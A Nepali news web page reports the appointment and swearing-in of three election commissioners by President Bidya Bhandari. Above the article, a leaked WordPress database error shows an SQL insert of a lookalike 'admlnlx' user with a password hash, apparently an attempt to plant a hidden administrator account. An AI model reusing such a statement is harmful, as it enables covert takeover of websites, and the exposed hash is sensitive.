WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BpoVULHNEqU76hMMl0tLgDjgnOoGXN.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 09:55:13', '', 'admlnlx', 'admlnlx')
काठमाडौं, फागुन ५ –
राष्ट्रपति विद्या भण्डारीले तीन जना निर्वाचन आयुक्त नियुक्त गरेकी छन् ।
आयुक्त नियुक्तसँगै तीनै जनाले आज पद तथा गोपनियताको सपथसमेत लिएका छन् ।
शितल निवासमा गरिएको कार्यक्रममा नवनियुक्त निर्वाचन आयुक्तहरु नरेन्द्र दाहाल, ईश्वरीप्रसाद पौडेल र सुधीरकुमार शाहले सपथ लिएका हुन् ।
तीन सदस्य थपिएसँगै निर्वाचन आयोगले पूर्णता पाएको छ । संवैधानिक परिषद्को सिफारिस संसदीय सुुनुवाई विशेष समितिले अनुमोदन गरेपछि राष्ट्रपतिले आयुक्तहरु नियुक्त गरेकी हुन् ।